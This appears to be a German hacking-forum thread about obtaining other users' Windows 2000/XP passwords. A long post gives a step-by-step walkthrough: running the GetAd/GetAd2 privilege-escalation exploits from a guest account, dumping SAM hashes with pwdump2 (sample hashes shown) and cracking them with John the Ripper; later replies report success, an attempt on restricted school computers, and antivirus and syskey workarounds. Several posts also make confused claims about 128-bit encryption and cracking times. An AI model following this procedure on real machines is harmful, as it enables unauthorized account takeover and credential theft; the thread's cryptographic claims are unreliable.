[HaBo]

AaFreak

Anzeige

Also, ich habe einen PC mit WinXp daheim. und ich habe mir 2 accounts gemacht! einen mit adminrechte und einen normalen user-account! .Und jetzt möchte ich wissen OB ES MÖGLICH IST(nicht wie man es macht)das Passwort von dem normalen User auszulesen?? Und ob es schwer, unmöglich oder leicht ist! Denn das ist eine Frage des Datenschutzes, und der sicherheit von winxp!

Würde mich echt mal interresieren!

by aafreak

Watchme

als Admin dieses PCs ist es sehr leicht....

als normaler User wirds schon echt hakelig bis unmöglich...

posidron

Sicher ist dies möglich, auch als normaler user , alles was du brauchst wären ein paar programme wie z.B.:

GetAd - GetAd.exe
- Exploit für Windows 2000 zum erlangen von root Rechten

GetAd2 - GetAd2.exe
- Exploit für Windows XP zum erlangen von root Rechten

pwdump2 - pwdump2.exe
- Zeigt die Hashes aus der .sam Datei an

John the Ripper - john.exe
- Zum encrypten der verschlüsselten Passwörter(Hashes aus .sam)

AaFreak

also ist win xp doch nicht so sicher wie es viele behaupten! wenn man schon als normaler user mit solchen tools die pw's rausfinden kann! ach ja danke für die namen der tools, die teste ich gleich mal bei mir aus, denn es interresiert mich schon sehr, ob es wirklich so leicht geht!

by aafreak

Porki

Wer auch immer die das gesagt hat... Windows XP kannst du das Passwort nicht auslesen da es 128 Bit verschlüsselt ist... Der heutzutage schnellste PC bräuchte 60000 Jahre um das Passwort auszulesen...
Also es sit unmöglich ich meine Windows hat nicht umssonst so viel Geld für Sicherheit in den PC geestecjkt (je nach dem wie amn es sieht)

posidron

Nunja, ich kann dir ja mal erleutern wie ich es genau gemacht habe und das es auch erfolgreich funktioniert hat. Das ganze prozedere hat nicht mal 20min gedauert. Das Passwort enthielt keine Sonderzeichen sonder bestand nur aus Nummern und Buchstaben. Das benutzte .sam file stammt von windows 2000 und wurde auf einem windows xp entschlüsselt. Neben bei ist dies nicht die einzigste Methode das Administrator Passwort bzw. Administrator Rechte unter windows 2000 zu bekommen(Stichwort: Linux Bootdisk, Recovery Console usw.)

Requirements
============

John the Ripper - john.exe
- Zum encrypten des verschlüsselten Passwortes

pwdump2 - pwdump2.exe
- Zeigt die Hashes aus der .sam Datei an

GetAd - GetAd.exe
- Exploit für Windows 2000 zum erlangen von root Rechten

GetAd2 - GetAd2.exe
- Exploit für Windows XP zum erlangen von root Rechten



Procedure
=========

Sich als Gast oder mit einem anderen berechtigten Account an das System anmelden. Wenn Windows 2000 verwendet wird, verwenden wir GetAd.exe, wenn Windows XP verwendet wird GetAd2.exe.

> C:\GetAd\GetAd.exe

Es öffnet sich eine Root-Shell in dem Verzeichniss "C:\Windows\System32". Nun wechseln wir in das Verzeichniss von "pwdump2" um

> C:\pwdump2\pwdump2.exe

Pwdump2 gibt nun als Ausgabe alle auf diesem System befindlichen Accounts aus.


Ein Beispiel ist unten aufgelistet.

a503-26:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d 16ae931b73c59d7e0c089c0:::
Administrator:500:19a2cf01594fb0f5aad3b435b51404ee :35c5f455886f2b6d8ad4696adbd90e3c:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0 d16ae931b73c59d7e0c089c0:::
Klassenarbeit 26:1001:564eef452bb4f84a36077a718ccdf409:534e24aac 311de4afbc162e3dc652577:::
Pr?fung 26:1002:d3eb5b2faf7ab9a08b88eb25b9c5dfca:62eac612c 20831a11e3774f48f692e43:::


Als nächstes kopieren wir die Ausgabe. Unter Windows 2000 Links klicken und selektieren anschließend loslassen und fertig.
Unter Windows XP Rechtsklick und selektieren mit den Cursortasten anschließend mit der Rechten Maustaste auf den Selektierten bereich klicken und fertig. Wenn dies geschehen ist fügen wir den eben kopierten Text in eine Textdatei ein und speichern sie ab. Die Textdatei benennen wir hier pwd.txt.

Als nächtes rufen wir John the ripper auf, mit dem wir später das Passwort entschlüsseln wollen.

> john

John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer

Usage: john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3


In diesem Beispiel benutzen wir den incremental Methode zum Entschlüsseln unseres Passwortes.


> john -i:all pwd.txt


Als Ausgabe erhalten wir in diesem Beispiel folgende, die auch bei anderen Sessions ähnlich ist.


Loaded 3 passwords with no different salts (NT LM DES [24/32 4K])

guesses: 0 time: 0:00:00:01 c/s: 42752 trying: MMWW - BRUS


John the ripper versucht nun das Passwort zu entschlüsseln in dem es jede Mögliche Kombination ausprobuiert. Je nach länge des Passwortes und Geschwindigkeit des Prozessors kann dies einige zeit in anspruch nehemn. Die nächsten Versuche von Jtr werden vorbehalten, mit "Enter" kann man die jeweilige Kombination die gerade probiert wird sehen.

Rushjo

Die einzige Einschränkung, die man noch erwähnen
sollte, ist das "aktuelle" VirenScanner wie McAffee, wenn
Sie im Hintergrund aktiv sind, die getAD.exe erkennen.
Dann verhindern sie das Kopieren bzw. Starten dieser!
Und abschalten kann man den VirenScanner auch nicht,
da man ja KEINE root-Rechte hat!
Und die pwdump2 benötigt root-Rechte.

MfG Rushjo

AaFreak

habs mal bei mir ausgetestet! lol funzt wirklich!
hätt nicht gedacht das es sooo einfach ist!

nook

Hmm @ home hat es wunderbar geklappt...

In der Schule nicht: Sachlage -->

Win2k User Account, Lese und Schreibrechte fuer eine Partition, keine Dos-box, kein Rechtsklick o.a., nur Start, Beenden und Programme
Keine Icons auf dem Desktop.. ueberhaupt eigentlich gar nix!

GetAd gestartet, es werden ein paar Zahlenfolgen probiert, und schlieszt sich danach automatisch.

Danach konnte ich die Dateien auch leider nicht mehr loeschen...

Jemand ne Idee was das sein koennte?
[Edit: Ich meine woran das liegen kann, dass er probiert und nichts passiert *g*]

Porki

Hey ich hab noch ne viel einfachere Variante gefunden wie man in einen Admin Modus kommt... Beim Start F8 so das man in den Abgesicherten Modus kommt und wer hätte es gedacth dort gibt es den Admin Modus... schon kann man sich einen eigenen Modus erschaffen und alles installieren was man will danach wieder löschen und fertig...

länger als 3 min hat das nich gedauert und braucht schließlicha uch keine Zusätzlichen Proggies

Crux

@Porki

Das geht auch nicht immer... wenn man das mit meinem PC macht braucht man trotzdem das Admin PW um ihn OS zu kommen, egal ob Normaler Modus oder Abgesicherten Modus.

@posidron

Das "tut" ist gut beschrieben... ich habe es immer mit der Linux BootDisk das SAM file geholt und es dann auf meinem PC mit Cain Cracken lassen

@ll

Was mich seit langen interessiert ist das "syskey" PW. Wenn man "Windowstaste + R" drückt und dann "syskey" eingibt kommt ein kleines Fenster (Geht nur bei Win2k & Win XP). Wenn man es aktiviert und dann den PC neu Startet kommt ein kleines Fenster was dich nach dem richtigen PW fragt. Wenn man es 3 mal falsch eingibt wird der PC Heruntergefahren.

Laut meines wissen wird da durch die SAM file um das doppelte verschlüsselt (Win2k 64Bit * 2 = 128bit & WinXP 128Bit * 2 = 256Bit).

Wenn man das Cracken läst dauert das Monate... gibt es da nicht eine Leichtere Möglichkeit? Ein Exploit oder so was in der art? Thx

MfG

Crux

Porki

Also ich mein nicht den Modus... wo ihr euch normal reingeht sondern z.b:

Normal
Administrator

SPrich wenn ich das im Abgesicherten Modus hochfahre is dieser Modus noch da...

Hab jetzt aber schon erfahren das es dafür noch extra sicherheitsmaßnahmen gibt...

Was mir aber noch immer merkwürdig erscheint das man das Passwort von Windows mit diesen Proggies auslesen kann obwohl dieser doch 128 bit verschlüsselt ist...

Crux

@Porki

Das ist normal in der Heutigenzeit. 128Bit Schlüssel werden geknackt wie (fast) nix. Wenn man so was schnell Knacken will nimmt man sich eh 5-10 PCs die daran arbeiten... dann hast so was in weniger als 1 min (vorausgesetzt die CPU Leistung stimmt).

MfG

Crux

Porki

Echt mir wurde von einem wirklich PC Profi udn ich mein nicht son Word Könner sondern son halb Hacker und so... Der meinte eine 128 Bit Verschlüsselung zu knakcen dauerte im schlechtesten Fall 30.000 Jahre... Bei höchster heutzutagiger Pc Leistung... Vielleicht war es aber auch 256 Bit

Crux

@Porki

Das bezweifle ich... es gibt schon so schnelle Tools/Programme die 128Bit Schlüssel sehr schnell schaffen.

Das hängt wird mir der Länge des PWs ab. Mein Notebook braucht für eine 7 stelliges MD5 Codierung 1 1/2 Tage und wenn ich das PW mit 5 PC Knacken lasse bin ich in weniger als eine min fertig (Das sind P4 2.5GHz > 3GHz CPUs).

MfG

Crux

P.S.: Hier hast du mal eine MD5 Codiertes PW (128bit) zum testen wie schnell du es drausen hast.